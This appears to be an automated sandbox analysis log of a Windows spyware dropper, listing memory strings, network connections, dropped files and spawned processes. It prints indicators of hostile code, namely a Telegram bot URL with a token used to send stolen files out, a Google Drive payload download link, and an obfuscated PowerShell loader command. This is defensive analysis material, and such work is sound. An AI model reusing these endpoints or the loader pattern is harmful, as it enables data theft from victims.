Source: powershell.exe, 00000002.00000002.2652429472.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2662602628.0000000008370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2652429472.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023C0D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/e&
Source: msiexec.exe, 00000006.00000002.3325605375.00000000231D0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA
Source: msiexec.exe, 00000006.00000003.2797383605.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2797448626.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2797383605.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1sZt2IUjDQYn1jf1R7CCXbvtdEmsX8dEA&export=download
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023B2B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023B2B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: msiexec.exe, 00000006.00000002.3326416598.0000000023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49921 version: TLS 1.2

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405705

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	File created: C:\Windows\huzzah.lnk			Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Code function: 0_2_00406C5F	0_2_00406C5F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0766C2CE	2_2_0766C2CE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3C148	6_2_00C3C148
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3D278	6_2_00C3D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C35362	6_2_00C35362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3C468	6_2_00C3C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3C738	6_2_00C3C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3E988	6_2_00C3E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3CA08	6_2_00C3CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3CCD8	6_2_00C3CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3CFA9	6_2_00C3CFA9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3A088	6_2_00C3A088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C37118	6_2_00C37118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C369B0	6_2_00C369B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3F961	6_2_00C3F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C3E97B	6_2_00C3E97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C33AC7	6_2_00C33AC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C33A24	6_2_00C33A24
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C33B61	6_2_00C33B61
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C33B15	6_2_00C33B15
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00C33E09	6_2_00C33E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26921E80	6_2_26921E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_269217A0	6_2_269217A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692FC68	6_2_2692FC68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D9A8	6_2_2692D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26922968	6_2_26922968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692E6B0	6_2_2692E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692E6A0	6_2_2692E6A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692DE00	6_2_2692DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26921E70	6_2_26921E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692178F	6_2_2692178F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692EF51	6_2_2692EF51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692EF60	6_2_2692EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692CCA0	6_2_2692CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26929C70	6_2_26929C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692DDFE	6_2_2692DDFE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D550	6_2_2692D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D540	6_2_2692D540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26929548	6_2_26929548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692EAF8	6_2_2692EAF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692E258	6_2_2692E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692E24A	6_2_2692E24A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26928B91	6_2_26928B91
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692F3B8	6_2_2692F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26928BA0	6_2_26928BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26929BF7	6_2_26929BF7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692EB08	6_2_2692EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26920B30	6_2_26920B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26920B20	6_2_26920B20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26929328	6_2_26929328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D0F8	6_2_2692D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D0E9	6_2_2692D0E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692F810	6_2_2692F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692501B	6_2_2692501B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692F802	6_2_2692F802
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692003F	6_2_2692003F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26925028	6_2_26925028
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_26920040	6_2_26920040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692D999	6_2_2692D999
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2692295B	6_2_2692295B

Source: ugpJX5h56S.exe

Static PE information: invalid certificate

Source: ugpJX5h56S.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/16@5/5

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

0_2_0040351C

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049B1

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Code function: 0_2_004021CF CoCreateInstance,

0_2_004021CF

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

File created: C:\Users\user\AppData\Roaming\interpellant

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

File created: C:\Users\user\AppData\Local\Temp\nsc5418.tmp

Jump to behavior

Source: ugpJX5h56S.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ugpJX5h56S.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\ugpJX5h56S.exe

File read: C:\Users\user\Desktop\ugpJX5h56S.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ugpJX5h56S.exe "C:\Users\user\Desktop\ugpJX5h56S.exe"
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: fontext.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: fms.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugpJX5h56S.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
